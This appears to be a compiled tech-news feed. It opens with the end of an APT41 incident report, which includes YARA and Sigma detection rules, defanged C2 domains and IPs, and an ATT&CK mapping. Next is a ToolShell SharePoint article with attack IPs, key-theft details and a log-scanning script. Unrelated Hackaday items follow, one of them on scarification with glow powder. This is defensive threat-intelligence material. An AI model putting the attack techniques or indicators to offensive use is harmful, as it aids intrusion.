We attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling, and C2 infrastructure with other APT41 campaigns. In particular:

  • The attackers used a number of tools characteristic of APT41, such as Impacket, WMI, and Cobalt Strike.
  • The attackers employed DLL sideloading techniques.
  • During the attack, various files were saved to C:\Windows\Temp.
  • The C2 domain names identified in this incident (s3-azure.com, *.ns1.s3-azure.com, *.ns2.s3-azure.com) are similar to domain names previously observed in APT41 attacks (us2[.]s3bucket-azure[.]online, status[.]s3cloud-azure[.]com).


Takeaways and lessons learned


The attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use penetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their target’s infrastructure, updating their malicious tools to account for specific characteristics. They can even leverage internal services for C2 communication and data exfiltration. The files discovered during the investigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for example, by rewriting executables and compiling them as DLLs for DLL sideloading.

While this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s systems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and continuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t connected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to maintain maximum coverage of your infrastructure with security tools that can automatically block malicious activity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and especially against using such accounts on all hosts across the infrastructure.

Appendix

Rules
Yara

rule neoregeorg_aspx_web_shell
{
    meta:
        description = "Rule to detect neo-regeorg based ASPX web-shells"
        author = "Kaspersky"
        copyright = "Kaspersky"
        distribution = "DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM"

    strings:
        $func1 = "FrameworkInitialize" fullword
        $func2 = "GetTypeHashCode" fullword
        $func3 = "ProcessRequest" fullword
        $func4 = "__BuildControlTree"
        $func5 = "__Render__control1"

        $str1 = "FAIL" nocase wide
        $str2 = "Port close" nocase wide
        $str3 = "Port filtered" nocase wide
        $str4 = "DISCONNECT" nocase wide
        $str5 = "FORWARD" nocase wide

    condition:
        uint16(0) == 0x5A4D and
        filesize < 400000 and
        3 of ($func*) and
        3 of ($str*)
}

Sigma

title: Service Image Path Start From CMD
id: faf1e809-0067-4c6f-9bef-2471bd6d6278
status: test
description: Detects creation of an unusual service executable that starts from cmd /c using the command line
references:
    - tbd
tags:
    - attack.persistence
    - attack.t1543.003
author: Kaspersky
date: 2025/05/15
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4697
        ServiceFileName|contains:
            - '%COMSPEC%'
            - 'cmd'
            - 'cmd.exe'
        ServiceFileName|contains|all:
            - '/c'
            - 'start'
    condition: selection
falsepositives:
    - Legitimate
level: medium
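To see what the Sigma selection above actually matches, the following added example (not part of the report) applies the same logic to Security event 4697 records rendered as Windows event XML: Sigma `contains` is a case-insensitive substring test, the first list is an OR, and `contains|all` is an AND. The event renderings are constructed; the third one carries `cmd` inside a vendor binary name and shows why the `/c` + `start` guard is needed.

```python
"""Apply the 'Service Image Path Start From CMD' selection to constructed
Security 4697 events in Windows event XML. Added example, not from the report."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ANY_OF = ("%comspec%", "cmd", "cmd.exe")  # ServiceFileName|contains (OR)
ALL_OF = ("/c", "start")                  # ServiceFileName|contains|all (AND)


def parse_event(xml_text):
    """Flatten <System>/<EventID> and every <EventData>/<Data Name=...> into a dict."""
    root = ET.fromstring(xml_text)
    event = {"EventID": int(root.find("e:System/e:EventID", NS).text)}
    for data in root.findall("e:EventData/e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event


def service_from_cmd(event):
    """Sigma string modifiers are case-insensitive substring matches."""
    if event.get("EventID") != 4697:
        return False
    path = event.get("ServiceFileName", "").lower()
    return any(t in path for t in ANY_OF) and all(t in path for t in ALL_OF)


def alert_service_names(xml_events):
    """Return the ServiceName of every rendered event the rule would fire on."""
    parsed = (parse_event(x) for x in xml_events)
    return [e["ServiceName"] for e in parsed if service_from_cmd(e)]


def _event(service_name, image_path):
    """Minimal 4697 rendering (constructed; only the fields the rule reads matter)."""
    return f"""<Event xmlns="{NS['e']}">
  <System><EventID>4697</EventID><Channel>Security</Channel></System>
  <EventData>
    <Data Name="SubjectUserName">svc_deploy</Data>
    <Data Name="ServiceName">{service_name}</Data>
    <Data Name="ServiceFileName">{image_path}</Data>
    <Data Name="ServiceType">0x10</Data>
    <Data Name="ServiceStartType">2</Data>
  </EventData>
</Event>"""


SAMPLE_EVENTS = [  # constructed
    _event("WinUpdateSvc", r"%COMSPEC% /c start /b C:\Windows\Temp\upd.bat"),
    _event("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    _event("CmdAgent", r"C:\Program Files\Vendor\cmdagent.exe --service"),
    _event("Helper", r'cmd.exe /c start "" "C:\ProgramData\helper.exe"'),
]

if __name__ == "__main__":
    print(alert_service_names(SAMPLE_EVENTS))
```

The rule is deliberately narrow: a service whose image path is a shell one-liner is unusual outside installers, which is where the listed false positive comes from. Tuning in practice means allow-listing the specific installer paths rather than loosening the `/c` + `start` condition.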

IOCs
Files


2F9D2D8C4F2C50CC4D2E156B9985E7CA
9B4F0F94133650B19474AF6B5709E773
A052536E671C513221F788DE2E62316C
91D10C25497CADB7249D47AE8EC94766
C3ED337E2891736DB6334A5F1D37DC0F
9B00B6F93B70F09D8B35FA9A22B3CBA1
15097A32B515D10AD6D793D2D820F2A8
A236DCE873845BA4D3CCD8D5A4E1AEFD
740D6EB97329944D82317849F9BBD633
C7188C39B5C53ECBD3AEC77A856DDF0C
3AF014DB9BE1A04E8B312B55D4479F69
4708A2AE3A5F008C87E68ED04A081F18
125B257520D16D759B112399C3CD1466
C149252A0A3B1F5724FD76F704A1E0AF
3021C9BCA4EF3AA672461ECADC4718E6
F1025FCAD036AAD8BF124DF8C9650BBC
100B463EFF8295BA617D3AD6DF5325C6
2CD15977B72D5D74FADEDFDE2CE8934F
9D53A0336ACFB9E4DF11162CCF7383A0
27F506B198E7F5530C649B6E4860C958

Domains and IPs


47.238.184[.]9
38.175.195[.]13
hxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
hxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa
hxxp://toun[.]callback.red/aaa
hxxp://asd.xkx3[.]callback[.]red
hxxp[:]//ap-northeast-1.s3-azure[.]com
hxxps[:]//www[.]msn-microsoft[.]org:2053
hxxp[:]//www.upload-microsoft[.]com
s3-azure.com
*.ns1.s3-azure.com
*.ns2.s3-azure.com
upload-microsoft[.]com
msn-microsoft[.]org

MITRE ATT&CK

Tactic               | Technique                                                         | ID
---------------------|-------------------------------------------------------------------|----------
Initial Access       | Valid Accounts: Domain Accounts                                   | T1078.002
                     | Exploit Public-Facing Application                                 | T1190
Execution            | Command and Scripting Interpreter: PowerShell                     | T1059.001
                     | Command and Scripting Interpreter: Windows Command Shell          | T1059.003
                     | Scheduled Task/Job: Scheduled Task                                | T1053.005
                     | Windows Management Instrumentation                                | T1047
Persistence          | Create or Modify System Process: Windows Service                  | T1543.003
                     | Hijack Execution Flow: DLL Side-Loading                           | T1574.002
                     | Scheduled Task/Job: Scheduled Task                                | T1053.005
                     | Valid Accounts: Domain Accounts                                   | T1078.002
                     | Web Shell                                                         | T1505.003
                     | IIS Components                                                    | T1505.004
Privilege Escalation | Create or Modify System Process: Windows Service                  | T1543.003
                     | Hijack Execution Flow: DLL Side-Loading                           | T1574.002
                     | Process Injection                                                 | T1055
                     | Scheduled Task/Job: Scheduled Task                                | T1053.005
                     | Valid Accounts: Domain Accounts                                   | T1078.002
Defense Evasion      | Hijack Execution Flow: DLL Side-Loading                           | T1574.002
                     | Deobfuscate/Decode Files or Information                           | T1140
                     | Indicator Removal: File Deletion                                  | T1070.004
                     | Masquerading                                                      | T1036
                     | Process Injection                                                 | T1055
Credential Access    | Credentials from Password Stores: Credentials from Web Browsers   | T1555.003
                     | OS Credential Dumping: Security Account Manager                   | T1003.002
                     | Unsecured Credentials                                             | T1552
Discovery            | Network Service Discovery                                         | T1046
                     | Process Discovery                                                 | T1057
                     | System Information Discovery                                      | T1082
                     | System Network Configuration Discovery                            | T1016
Lateral Movement     | Lateral Tool Transfer                                             | T1570
                     | Remote Services: SMB/Windows Admin Shares                         | T1021.002
Collection           | Archive Collected Data: Archive via Utility                       | T1560.001
                     | Automated Collection                                              | T1119
                     | Data from Local System                                            | T1005
Command and Control  | Application Layer Protocol: Web Protocols                         | T1071.001
                     | Application Layer Protocol: DNS                                   | T1071.004
                     | Ingress Tool Transfer                                             | T1105
                     | Proxy: Internal Proxy                                             | T1090.001
                     | Protocol Tunneling                                                | T1572
Exfiltration         | Exfiltration Over Alternative Protocol                            | T1048
                     | Exfiltration Over Web Service                                     | T1567

securelist.com/apt41-in-africa…


ToolShell: the new threat hitting Microsoft SharePoint servers


An advanced cyberattack campaign targeting Microsoft SharePoint servers has been identified. The threat relies on a chain of vulnerabilities known as "ToolShell" that lets attackers take full remote control of the affected systems while bypassing authentication.

Eye Security, a Dutch cybersecurity company, identified active exploitation on July 18, 2025, revealing what security researchers describe as one of the fastest transitions from proof of concept to mass exploitation in recent history.

The vulnerability chain combines two critical security flaws, CVE-2025-49706 (cybersecuritynews.com/microsof…) and CVE-2025-49704 (cybersecuritynews.com/microsof…), originally demonstrated at Pwn2Own Berlin 2025 in May and subsequently reproduced by security researchers at CODE WHITE GmbH, a German offensive-security company.
Post on X from the Microsoft Security Response Team account
The exploit stayed dormant until July 15, 2025, when CODE WHITE publicly shared the detailed results of its research on social media, after Microsoft had released the official patch. Within just 72 hours of public disclosure, threat actors had successfully weaponized the exploit for coordinated, large-scale attacks.

Eye Security's in-depth investigation revealed that attackers began systematic mass exploitation on July 18, 2025, at around 18:00 Central European Time, initially using the IP address 107.191.58.76. A second, distinct wave of attacks emerged from 104.238.159.149 on July 19, 2025, at 07:28 CET, clearly pointing to a well-coordinated international campaign.

The ToolShell exploit bypasses traditional authentication mechanisms by targeting the vulnerable SharePoint endpoint /_layouts/15/ToolPane.aspx. Unlike conventional web shells, which are designed primarily for command execution, the malicious payload specifically extracts sensitive cryptographic keys from the SharePoint servers, including the critical ValidationKey and DecryptionKey material.

"This was not your typical web shell," Eye Security researchers explained in their detailed technical analysis. "The attacker turns SharePoint's inherent trust in its own configuration into a powerful weapon." Once these cryptographic secrets have been obtained, attackers can craft fully valid __VIEWSTATE payloads to achieve full remote code execution without needing any user credentials.

The sophisticated attack uses techniques similar to CVE-2021-28474, exploiting SharePoint's deserialization and control-rendering processes. By obtaining the server's ValidationKey, attackers can digitally sign malicious payloads that SharePoint automatically accepts as legitimate, trusted input, effectively bypassing the existing security checks and defensive measures.

Eye Security's comprehensive scan of more than 1,000 SharePoint servers distributed worldwide turned up dozens of actively compromised systems across numerous organizations. The security company immediately initiated responsible-disclosure procedures, directly contacting all affected organizations and national Computer Emergency Response Teams (CERTs) across Europe and internationally.
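Because the article names both the abused endpoint and the two source addresses, a first-pass check can be run against IIS logs alone. The script below is an added example, not Eye Security's tooling: it parses W3C-format IIS logs, keeps requests whose path ends in /_layouts/15/ToolPane.aspx (site-relative paths such as /sites/x/_layouts/15/ToolPane.aspx included), and flags either a known source IP or an anonymous POST (cs-username of "-", since the exploit bypasses authentication while legitimate page editors POST to the same endpoint while signed in). The log lines are constructed; the field list mirrors the default IIS W3C layout.

```python
"""Flag ToolPane.aspx requests in IIS W3C logs: known ToolShell source IPs
(from the article) or unauthenticated POSTs. Added example; SAMPLE_LOG is
constructed, not a real server log."""
from dataclasses import dataclass

KNOWN_IPS = {"107.191.58.76", "104.238.159.149"}  # named in the article above
TARGET = "/_layouts/15/toolpane.aspx"             # compared case-insensitively


@dataclass
class Hit:
    when: str
    client_ip: str
    user: str
    status: str
    reason: str


def parse_w3c(text):
    """Yield one dict per request; column names come from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")          # W3C encodes embedded spaces as '+'
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def scan(text):
    hits = []
    for rec in parse_w3c(text):
        if not rec["cs-uri-stem"].lower().endswith(TARGET):
            continue
        ip, user = rec["c-ip"], rec["cs-username"]
        if ip in KNOWN_IPS:
            reason = "known ToolShell source IP"
        elif rec["cs-method"] == "POST" and user == "-":
            # The chain bypasses authentication, so an anonymous POST to the
            # editing endpoint is the signal; signed-in editors POST here too.
            reason = "unauthenticated POST to ToolPane.aspx"
        else:
            continue
        hits.append(Hit(f'{rec["date"]} {rec["time"]}', ip, user, rec["sc-status"], reason))
    return hits


SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-18 16:02:11 10.10.1.20 POST /_layouts/15/ToolPane.aspx - 443 - 107.191.58.76 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 118
2025-07-18 16:05:40 10.10.1.20 GET /sites/hr/_layouts/15/start.aspx - 443 CORP\\jdoe 10.10.5.14 Mozilla/5.0 - 200 0 0 35
2025-07-18 16:07:02 10.10.1.20 POST /sites/hr/_layouts/15/ToolPane.aspx - 443 CORP\\jdoe 10.10.5.14 Mozilla/5.0 - 200 0 0 90
2025-07-19 05:28:17 10.10.1.20 POST /_layouts/15/ToolPane.aspx - 443 - 104.238.159.149 python-requests/2.32 - 200 0 0 101
2025-07-19 05:30:00 10.10.1.20 POST /_layouts/15/ToolPane.aspx - 443 - 198.51.100.7 Mozilla/5.0 - 401 0 0 12
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.when}  {h.client_ip:16} {h.status}  {h.reason}")
```

The authenticated CORP\jdoe edit is left alone, while the 401 from the unlisted address is still reported: a failed anonymous POST to this endpoint is an attempt worth correlating even when the server rejected it. A hit with status 200 from an anonymous client is the case to treat as a probable compromise, at which point the keys the article describes should be assumed stolen and rotated.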

The article ToolShell: the new threat hitting Microsoft SharePoint servers comes from il blog della sicurezza informatica.


Researching Glow-Powder Left a few Scars


Content warning: Human alteration and scalpels.
General warning: We are not speaking as doctors. Or lawyers.

If you watch sci-fi, you probably do not have to think hard to conjure a scene in a trendy bar where the patrons have glowing make-up or tattoos. That bit of futuristic flair was possible years ago with UV-reactive tattoo ink, but it has the unfortunate tendency to permanently fade faster than traditional ink. [Miana], a biohacker, wanted something that could last forever and glow on its own. After months of research and testing, she presents a technique with a silica-coated powder and scarification. Reddit post with graphic content.

The manufacturer does not sell the powder for internal use, so it requires sterilization in an autoclave, which should tell you why this is a hack and not just repurposing. The experimentation includes various scarification techniques and different bandaging approaches, but this is still a small group, and the oldest is measured in months, not years, as of the time of writing.

We think these look amazing, but there are significant caveats. If you have never done scarification, spoiler, it hurts! If the flesh cutting is not bad enough, someone gets to rub sand into the open cuts. You may find yourself carrying a UV flashlight everywhere to charge it up. [Miana] was kind enough to provide the link to the powder she uses, but this link is provided solely so our readers can investigate the ingredients.

If you are more interested in the glowing aspect than the biohacking part, be sure to read about making strontium aluminate. If you want to get into the weeds, you can make a phosphorescence detector and quantify how glow-y something is.


hackaday.com/2025/07/20/resear…


IO E CHATGPT E08: Learning a new language


In this episode we look at whether generative AI tools can be used to learn a new language.


zerodays.podbean.com/e/io-e-ch…


Remembering Chiptunes, the Demoscene and the Illegal Music of Keygens


We loved keygens back in the day. Our lawyers advise us to clarify that it’s because of the demo-scene style music embedded in them, not because we used them for piracy. [Patch] must feel the same way, as he has a lovely historical retrospective out on “The Internet’s Most Illegal Music” (embedded below).

After defining what he’s talking about for the younger set, who may never have seen a keygen in this degenerate era of software-by-subscription, [Patch] traces the history of the jaunty chiptunes that were so often embedded in this genre of program. He starts with the early demoscene and its relationship with cracker groups — those are coders who circulate “cracked” versions of games, with the copyright protection removed. In the old days, they’d embed an extra loading screen to take credit for the dastardly deeds that our lawyer says to disavow.


Because often the same people creating the amazing audio-video demos of the “demoscene” were involved in cracking, those loading screens could sometimes outshine the games themselves. (We saw it at a friend’s house one time.) There was almost always excellent music provided by the crackers, and given the limitations of the hardware of the era, it was what we’d know of today as a “chiptune”.

The association between crackers and chiptunes lasted long after the chips themselves had faded into obsolescence. Part of the longevity of the tracker-built tunes is that in the days of dial-up you’d much rather have a keygen with a .MOD file embedded than an .MP3, or god forbid, an uncompressed .WAV that would take all day to download.

Nowadays, chiptunes are alive and well, and while they try and hearken back more to the demoscene than the less savory side of their history, the connection to peg-legged programmers is a story that deserves to be told. The best part of the video is the link to keygenmusic.tk/ where you can finally find out who was behind that bopping track that’s been stuck in your head intermittently since 1998. (When you heard it at a computer lab, not on your own machine, of course.)

The demoscene continues to push old machines to new heights, and its spirit lives on in hacking machines like the RP2040.

youtube.com/embed/zHgcrdv8zpM?…


hackaday.com/2025/07/20/rememb…


Hackaday Links: July 20, 2025



In the relatively short time that the James Webb Space Telescope has been operational, there’s seemingly no end to its list of accomplishments. And if you’re like us, you were sure that Webb had already achieved the first direct imaging of a planet orbiting a star other than our own a long time ago. But as it turns out, Webb has only recently knocked that item off its bucket list, with the direct visualization of a Saturn-like planet orbiting a nearby star known somewhat antiseptically as TWA 7, about 111 light-years away in the constellation Antlia. The star has a significant disk of debris orbiting around it, and using the coronagraph on Webb’s MIRI instrument, astronomers were able to blot out the glare of the star and collect data from just the dust. This revealed a faint infrared source near the star that appeared to be clearing a path through the dust.

The planet, dubbed TWA 7b, orbits its star at about 50 times the distance from Earth to the Sun and is approximately the size of Saturn, but only a third of its mass. The star itself is only about 6.4 million years old, so the planet may still be accreting from the debris disk, which might present interesting insights into planetary formation, assuming that other astronomers confirm that TWA 7b is indeed a planet. But what’s really interesting about this discovery is that because the star system’s orbital plane appears to be more or less perpendicular to ours, the standard exoplanet detection method based on measuring the dimming of the star by planets passing between it and us wouldn’t have worked. This might open the doors to the discovery of many more exoplanets, and that’s pretty exciting.

Question: What’s worse than a big space rock that’s on a collision course with Earth? Answer: Honestly, it feels like a lot of things would be worse than that right now. But if your goal is planetary protection, one possible answer is doing something that turns the one big rock into a lot of little rocks. That seems to be just what NASA’s DART mission did when it smashed into a bit of space debris named Dimorphos back in 2022, ejecting over 100 boulders from the asteroid-orbiting moonlet. LICIAcube, an Italian cubesat that hitched a ride on DART, used optical cameras to observe the ejecta, and measured rocks from 0.2 m to 3.6 m in diameter as they yeeted off at up to 52 meters per second. Rather than spreading out randomly, the boulders clustered into two different groups, something that years of playing Asteroids has taught us isn’t what you’d expect. The whole thing just goes to show that planetary protection isn’t as simple as blasting into a killer asteroid and hoping for the best. And please, can somebody out there type “NASA DART” into Google and tell me what they see? Because if it’s not an animated spacecraft zipping across the screen and knocking the window out of kilter, then I need a vacation. K, thanks.

Do you even code? If you’re reading Hackaday, chances are good that you at least know enough coding to get yourself into trouble. But if you don’t, or you want to ruin somebody else’s life, er, bring someone new into the wonderful world of bossing computers around, take a look at Micro Adventure, an online adventure game aimed at teaching you the basics — err, BASICs — of coding. The game walks you through a text-based RPG (“You’re in a dark room…”) and prompts you to code your way through to a solution. The game has an emulator window that appears to be based on MS/DOS 1.00, so you know it’s cutting-edge stuff. To be fair, it’s always been our experience that coding is mostly about concepts, and once you learn what a loop is or how to branch in one language, figuring it out in another language is just about syntax. There seem to be at least six different adventures planned, so perhaps other languages will make an appearance in the future.

And finally, while we’re talking about the gamification of nerd education, if you’ve been meaning to learn Morse code, you might want to check out Morse Code Defender. It’s an Android app that uses a Missile Command motif to help you learn Morse, with attacking missiles having a character attached to them, and you having to enter the correct Morse code to blow the missile up before it takes out your ham shack. We haven’t tried it yet, so there may be more to it, but it sure seems like a cute way to gamify the Morse learning process. Honestly, it’s got to be better than doomscrolling Instagram.


hackaday.com/2025/07/20/hackad…


Designing an Open Source Multimeter: the HydraMeter



Our hacker [John Duffy] wrote in to let us know about a video he put together to explain the design of his open-source multimeter, the HydraMeter.

If you’re interested in how the circuitry for a voltmeter, ohmmeter, or ammeter might work, this video is a masterclass. In this long and detailed video, [John] walks us through his solutions to various challenges he had while designing his own multimeter. We covered this multimeter last year, and this new video elaborates on the design of the HydraMeter which has been a work in progress for years now.

The basic design feeds voltage, current, and resistance front-ends into an Analog to Digital Converter (ADC), which then feeds into a microcontroller and out to the (detachable) display. You can find the KiCad design files on the GitHub page. There is also a write-up on hackaday.io.

The user interface for the meter is… opinionated, and perhaps not to everyone’s taste. In the video, [John] talks a little bit about why he made the UI work the way that it does, and he noted that adding a rotary range switch is a goal for version 2.0.

The case is 3D printed and [John] had glowing things to say about his Bambu printer. He also had glowing things to say about D-sub connectors, but he did not have glowing things to say about Solid Edge, the CAD software he used to design the case.

Thank you, [John], for putting this video together; it is an excellent resource. We look forward to seeing version 2.0 develop soon!

youtube.com/embed/WZxFVFWPRwQ?…


hackaday.com/2025/07/20/design…


When a Record Player Doesn’t Work Due to Solid State Grease


Normally, mechanical devices like record players move smoothly, with well-greased contact surfaces enabling the tone arm to move automatically, the multi-record mechanism to drop down a fresh disc, and the listener to have a generally good time. Unfortunately, the 1972-era ITT KP821 record player that a friend recently handed to [Mark] wasn’t doing much moving at all: every part of the mechanism seemed frozen in place, and the owner wasn’t certain whether they were doing something wrong.


Fortunately, this record player was in exceptionally good condition. The primary failure was that the BSR record player mechanism, with its many touching metal surfaces, was suffering from a bad case of solidified grease. Although this is easily fixed with some IPA and a lot of elbow grease, the biggest trick with these mechanisms is putting them back together after cleaning, with many seemingly randomly shaped parts and every single E-clip that the manufacturer could design for and source at the time.

With that complete, this just left some pot cleaning and replacing a busted fuse in the amplifier section. The selenium rectifier was still functional, as were the SGS TAA621AX1 audio amplifier ICs. Despite the age of this ‘portable’ record player, both its BSR mechanism and the twin speakers that are part of the record player are in remarkably good condition. Much like with a car, it seems that you just have to swap out the liquid-y elements before they turn into a solid.

youtube.com/embed/bVNJbGhCQEA?…


hackaday.com/2025/07/20/when-a…


Mercedes-Benz and Microsoft team up to bring Teams and Microsoft 365 Copilot into cars starting this summer


On July 16, Mercedes-Benz announced in a press release an expansion of its collaboration with Microsoft, introducing the latest Office and collaboration tools, including an updated version of the Meetings for Teams app. This new feature lets occupants join video conferences directly from the car, using the on-board camera, even while driving.

Mercedes-Benz has also become the first carmaker to natively integrate Microsoft Intune into its MB.OS on-board operating system, extending remote-work possibilities directly into the car. The two companies also confirmed plans to integrate Microsoft 365 Copilot, the generative-AI assistant, which will make preparing and managing meetings more efficient.

According to the announcement, these new features will debut this summer on the new Mercedes-Benz CLA equipped with the fourth-generation MBUX system and MB.OS.

With the new Meetings for Teams app, drivers can join video conferences using the vehicle’s built-in camera. For safety, the system follows local regulations: while driving, the video-conference screen is disabled automatically, preventing the driver from viewing shared content or presentations. The camera can be switched off at any time. The app has also been optimized for business use, offering a new interface with a “next meeting” preview, quick access to frequently used contacts, improved chat and voice-driven text entry. It is also possible to jump from the calendar to the Teams meeting with a single tap, for a quick and intuitive transition.

Finally, the press release highlights the development of the Microsoft 365 Copilot integration as one of the first AI-based collaborative assistants designed for the automotive world. Users will be able to use voice commands to quickly summarize emails, retrieve customer information and schedule appointments, allowing more efficient and safer management of daily tasks without distraction while driving.

The article Mercedes-Benz and Microsoft team up to bring Teams and Microsoft 365 Copilot into cars starting this summer comes from il blog della sicurezza informatica.


8 Bit Mechanical Computer Built from Knex


Long before electricity was a common household utility, humanity had been building machines to do many tasks that we’d now just strap a motor or set of batteries onto and think nothing of it. Transportation, manufacturing, agriculture, and essentially everything had non-electric analogs, and perhaps surprisingly, there were mechanical computers as well. Electronics-based computers are far superior in essentially every way, but the aesthetics of a mechanical computer are still unmatched, like this 8-bit machine built from K’nex.


The K’nex computer is built by [Shadowman39], and this first video features just the ALU. It can accept numbers from 0-255 or -128 to 127 and can add two of these numbers by storing them in registers using levers to represent each digit. A drive system underneath with a rack and pinion system operates on each digit, eventually outputting the sum. It can also perform other mathematical operations like subtraction and handling negative numbers using the two’s complement method.

Although this video only goes over the ALU for the mechanical computer, we look forward to [Shadowman39]’s future videos, which go over the other parts of the machine. The basics of the computer are shown in intricate detail. Mechanical computers like these, while generally built as passion projects and not as usable computers, are excellent ways to get a deeper understanding of their electronics-based cousins. Another way to dive deep into this sort of computing world is by building a relay computer.

youtube.com/embed/EtIJUwkOAwM?…


hackaday.com/2025/07/20/8-bit-…


Engine Data Displayed Live On Dash


In the auto world, there are lots of overarching standards that all automakers comply with. There are also lots of proprietary technologies that each automaker creates and uses for its own benefit. [Shehriyar Qureshi] has recently been diving into Suzuki’s Serial Data Line standard, and has created a digital dash using the data gained.

The project started with Python-based scanner code designed to decode Suzuki’s SDL protocol. Armed with the ability to read the protocol, [Shehriyar] wanted to be able to do so without having to haul a laptop around in the car. Thus, the project was ported to Rust, or “oxidized” if you will.


[Shehriyar] has installed the system in a Suzuki Baleno. A Raspberry Pi uses a VAG KKL interface, plugged into the car’s OBD port, to reach the SDL line. It decodes this data and processes it to pull out parameters such as speed and RPM, then drives an LCD display on the double-DIN stereo in the dash. A simple composite output allows the system to display live data while driving the vehicle. The UI uses the Ratatui library. The result is a display that updates both smoothly and rapidly. It has a great retro vibe that kind of reminds us of some interfaces seen in Hollywood movies. Despite being analog video, the results are pretty sharp.

We’ve seen a few great digital dashboards over the years.

Crazy news: Ratatui made it into a car dashboard 😱🎉🚗 suzui-rs — Suzuki Serial Data Line viewer in Rust📟 Displays live car data, powered by Pi and shown on stereo over RCA🦀 Written in Rust & built with @ratatui.rs ⭐ GitHub: github.com/thatdevsherr…#rustlang #ratatui #tui #car #suzuki

Orhun Parmaksız (@orhun.dev) 2025-07-14T12:27:41.398Z


hackaday.com/2025/07/20/engine…


Chinese humanoid robot swaps its own battery and works 24 hours a day


La presentazione del Walker S2 rappresenta un importante passo avanti nell’autonomia operativa dei robot umanoidi. Grazie alla capacità di sostituire autonomamente la propria batteria, il robot può garantire un funzionamento continuativo, superando uno dei limiti più rilevanti nell’impiego dei robot in ambienti industriali e di servizio: la necessità di frequenti interventi manuali per la ricarica. Questa innovazione apre nuove prospettive per l’automazione di processi complessi che richiedono operatività costante.

The Walker S2 humanoid robot replaces its own battery


The humanoid-robot training centre inaugurated in Shanghai will play a strategic role in the development of artificial intelligence applied to robotics.

By training robots from various industrial contexts and collecting data on their performance, UBTech will be able to iteratively improve the control algorithms and cognitive capabilities of its machines, increasing their efficiency and adaptability to ever more complex real-world scenarios.

youtube.com/embed/mHP1WGlw5Wk?…

With a history dating back to 2012 and a portfolio of solutions ranging from entertainment to industry, UBTech once again shows that it is betting on innovation to consolidate its leadership in the sector. The start of Walker S1 production in October 2024 and the recent announcement of the Walker S2 confirm the company's strategy: integrating advanced hardware and artificial intelligence to build ever more autonomous and versatile robots.

In conclusion, UBTech positions itself as one of the most dynamic players in the global humanoid-robotics market, helping to shape the future of human-machine interaction. The ability to operate 24 hours a day without human intervention marks a significant turning point for the entire sector.

UBTECH ROBOTICS CORP LTD


Founded in March 2012, UBTECH ROBOTICS CORP LTD is today one of the world's leading companies in humanoid robots and intelligent service robots. Since 29 December 2023 the company has been officially listed on the Main Board of the Hong Kong Stock Exchange (stock code: 9880.HK).

Driven by its mission of "bringing intelligent robots into every household and making everyday life more convenient and intelligent", UBTECH has independently developed a full range of humanoid-robotics technologies. Thanks to its full-stack capabilities, the company handles research and development, design, intelligent manufacturing and commercialisation of service robots, offering an integrated solution that combines hardware, software, services and content. Applications range from AI-based education to logistics, elderly care and business services.

UBTECH is one of the few companies in the world to have built a full-stack technology platform integrating advanced motion planning and control systems, proprietary servo actuators, computer-vision technologies, voice interaction, SLAM (simultaneous localisation and mapping), visual servoing, human-robot interaction and its own application framework, the Robot Operating System Application Framework (ROSA). The company also stands out for mass-producing variable-torque servo actuators, a technological achievement that made possible the development of Walker, the first full-size bipedal humanoid robot commercialised in China.

As of June 2024, UBTECH held more than 2,450 patents in robotics and artificial intelligence, of which about 60% are invention patents and more than 450 are international patents. These results have positioned the company as a global leader in deploying humanoid robots in three main scenarios: industrial manufacturing, commercial services and home assistance. UBTECH is also currently the only humanoid-robot company to have started numerous collaborations with international carmakers, placing its Walker S industrial robot on production lines to perform a variety of tasks.

Looking to the future, UBTECH firmly believes in harmonious coexistence between humans and robots. Through a constant commitment to technological innovation, the company aims to bring its robots into every home and every industry, helping to build a society in which humans and robots work together to improve quality of life.

The article Chinese humanoid robot swaps its own battery and works 24 hours a day comes from il blog della sicurezza informatica.


Project Scribe: Receipts for Life


Project Scribe thermal printer printing out a receipt

Here’s a fun project. Over on their YouTube page [Urban Circles] introduces Project Scribe.

The idea behind this project is that you can print out little life "receipts": notes, jokes, thoughts, anecdotes, memories. These little paper mementos have a physical reality that goes beyond their informational content. You can cut them up, organize them, scribble on them, highlight them, stick them on the wall, or put them in a scrapbook. The whole idea of the project is to help you make easier and better decisions every day by nudging you toward being more mindful of where you've been and where you're going.

The project is well documented on its GitHub page. The heart of the project is a thermal printer, the kind that prints the receipts you get from the store. You may need to do some research to find the best thermal paper to use; there are hints and tips on this topic in the documentation. Alongside the thermal printer there is a pretty stand to hold it and an Arduino board to drive it. Firmware for the Arduino is provided, and it serves a basic web interface over WiFi.

If you build one, we’d love to hear how it goes. If it doesn’t work out, you can always fall back to using the thermal printer to level up your Dungeons and Dragons game.

Thanks to [Brittany L] for writing in about this one.

youtube.com/embed/JOlX4iSBhp8?…


hackaday.com/2025/07/20/projec…